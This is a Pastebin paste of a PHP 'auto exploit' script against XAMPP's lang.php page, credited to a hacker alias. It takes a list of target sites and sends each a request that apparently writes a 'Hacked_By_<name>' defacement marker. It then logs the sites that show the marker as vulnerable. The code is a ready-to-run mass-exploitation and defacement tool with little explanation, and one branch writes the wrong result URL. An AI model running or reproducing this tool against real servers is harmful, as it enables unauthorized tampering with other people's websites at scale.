API tools faq
paste
Advertisement
shor7cut

Auto Exploit : Xampp Lang.php - shor7cut

shor7cut
Jul 21st, 2015
1,346
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.41 KB | None | 0 0
raw download clone embed print report
  1. CODE BY shor7cut - Kiddies selalu merubah :v
  2. Thank's : IndoXploit Coders Team & Bug7sec
  3.  
  4. <?php
  5. error_reporting(0);
  6. if(!isset($argv[2])){
  7.     echo "[+] Format : php namefile.php {file list} {notice by} {save file}\r\n";
  8.     echo "[+] Contoh : php namafile.php target.txt shor7cut sukses.txt";
  9. }
  10.  
  11.  
  12. if(!file_exists($argv[1])){
  13.   die('File Tidak ditemukan');
  14. }
  15.  
  16. if(file_exists($argv[2].".txt")){
  17.     $del = $argv[2].".txt";
  18.     unlink($del);
  19. }
  20.  
  21.  
  22. $buka_file = fopen($argv[1], "r");
  23. $baca_file = fgets($buka_file);
  24. $target = explode("|", $baca_file);
  25. $hacker = $argv[2];
  26. $no=1;
  27. $success=0;
  28. $fail=0;
  29. $names = $argv[2].".txt";
  30. echo "<------------{Scan}-------------->\r\n";
  31. echo "-> Notice By ".$argv[2]."\r\n";
  32. echo "-> Target Count : ".count($target)."\r\n";
  33. echo "-> Save File : ".$names."\r\n";
  34. echo "<-------------------------------->\r\n\n";
  35. foreach ($target as $sites) {
  36. echo "-> INFO : [$no/".count($target)."] -( Success : ".$success." | Fail : ".$fail." )-\r\n";
  37. echo "-> $sites | Status : ";
  38. $url1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  39. $url2 = "$sites/security/lang.php?Hacked_By_$hacker";
  40. $patch_result1 = "$sites/xampp/lang.tmp?";
  41. $patch_result2 = "$sites/security/lang.tmp?";
  42.  
  43. // xampp - patch lang.php\\
  44. $xamppcurl = curl_init("$url1");
  45. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  46. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  47. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  48. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  49. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  50. $result1 = curl_exec($xamppcurl);
  51.  
  52. $xamppcur2 = curl_init("$url2");
  53. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  54. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  55. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  56. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  57. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  58. $result2 = curl_exec($xamppcur2);
  59.  
  60.  
  61.  
  62. if(eregi("Hacked_By_",$result1))
  63. {
  64.     echo "vulnerable\r\n";
  65.     echo "-> Patch : ".$patch_result1."\r\n\n";
  66. $fp = fopen($names, 'a');
  67. fwrite($fp, "http://$patch_result1\r\n");
  68. fclose($fp);
  69. $success++;
  70. }else if(eregi("Hacked_By_",$result2))
  71. {
  72.         echo "vulnerable\r\n";
  73.         echo "-> Patch : ".$patch_result2."\r\n\n";
  74. $fp = fopen($names, 'a');
  75. fwrite($fp, "http://$patch_result1\r\n");
  76. fclose($fp);
  77. $success++;
  78. }else {
  79.             echo "Not vulnerable\r\n\n";
  80.             $fail++;
  81. }
  82.  
  83.     flush();
  84.     ob_flush();
  85.     sleep(2);
  86.     $no++;
  87.     }
  88. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!